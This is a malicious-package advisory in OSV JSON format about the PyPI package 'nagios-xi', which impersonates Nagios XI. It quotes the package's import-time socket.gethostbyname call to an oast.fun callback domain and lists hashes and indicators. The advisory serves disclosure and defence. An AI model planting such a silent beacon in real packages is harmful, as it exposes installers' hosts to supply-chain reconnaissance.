{"id":"MAL-2026-5698","summary":"Malicious code in nagios-xi (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f)\nOn `import nagios_xi`, the package's `__init__.py` (lines 5-8) invokes `socket.gethostbyname(\"atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun\")` inside a silent try/except. oast.fun is ProjectDiscovery's Interactsh out-of-band callback service; the DNS query itself is the exfiltration channel, confirming code execution on the installer's host and leaking the resolver IP to whoever controls the unique 32-character Interactsh subdomain. The package ships no actual functionality — it impersonates the Nagios XI commercial monitoring product (name `nagios-xi`, version `19.5.0` mimicking real Nagios XI versioning) while declaring an anonymous ProtonMail author (`Coding Team \u003cpocbug@protonmail.com\u003e`), a generic `package utility` description, and an empty README. The combination of brand impersonation, placeholder metadata, and an import-time OAST beacon as the package's sole behavior is reconnaissance for a supply-chain attack against developers searching for Nagios XI integrations.\n\n## Source: kam193 (d8b27c2588accf4f2966f4630a12f9bfdc4ba621403f14237160632447152f23)\nInstalling the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.\n\n\n---\n\nCategory: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.\n\n\nCampaign: GENERIC-standard-pypi-install-pentest\n\n\nReasons (based on the campaign):\n\n\n - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n","modified":"2026-06-12T20:02:00.831577719Z","published":"2026-06-12T15:27:24Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-06-12T16:32:19.011939508Z","sha256":"d8b27c2588accf4f2966f4630a12f9bfdc4ba621403f14237160632447152f23","source":"kam193","id":"pypi/GENERIC-standard-pypi-install-pentest/nagios-xi","versions":["19.4.0","19.5.0"],"modified_time":"2026-06-12T15:27:24.46448Z"},{"import_time":"2026-06-12T19:44:18.873734183Z","sha256":"bf230c0a9f6b4215c87f567dc3b40574dc7e8581debf2cf518621e9491241886","source":"amazon-inspector","id":"IN-MAL-2026-006196","versions":["19.5.0"],"modified_time":"2026-06-12T19:11:02Z"},{"import_time":"2026-06-12T19:44:18.777294268Z","sha256":"c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f","source":"amazon-inspector","id":"IN-MAL-2026-006195","versions":["19.5.0"],"modified_time":"2026-06-12T19:11:01Z"}]},"references":[{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/nagios-xi"},{"type":"PACKAGE","url":"https://pypi.org/project/nagios-xi/19.5.0/"}],"affected":[{"package":{"name":"nagios-xi","ecosystem":"PyPI","purl":"pkg:pypi/nagios-xi"},"versions":["19.4.0","19.5.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/nagios-xi/MAL-2026-5698.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"domains":["atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun"],"evidence_files":[{"sha256":"36dea5501185191fc23e357d31dcf965b05e6573667a2f069bc599583a25ce9d","tlsh":"3fd012568d9595512376931d001a4598e19952034a121e3735fddb805f7617108b3399","path":"nagios_xi/__init__.py"},{"sha256":"05321a5ace4b9b52ae3635fec8c626890e2c0aefd9c6f93c27fcab947f88e1e0","tlsh":"b8f0dc3389c3eea96792419030158120da71916e2b84c4ea76fec18d6babd40c7fcc34","path":"pyproject.toml"}],"package_integrity":[{"hashes":{"blake2b_256":"0414f620b2350dc87b6128e791674b646188f892e4bc8f96b7ec3c22bd7969b7","sha256":"0c13fa1337c4fcfbed11201d528adcadfe6e02b86387fa2e029966b0e3f08c38","md5":"cccc2a73e13244868b175ca85f33cf28"},"filename":"nagios_xi-19.5.0-py3-none-any.whl"},{"hashes":{"blake2b_256":"f4d535cec652948dada4a2f987250ae1f3e706a1bcf69790209a34685289a7cb","sha256":"73668f0ab1312b81e895747d19bc12a04a152d837dc864bca6eae76fcb30841f","md5":"47adb051c92db6a22b350bf9d858af3e"},"filename":"nagios_xi-19.5.0.tar.gz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}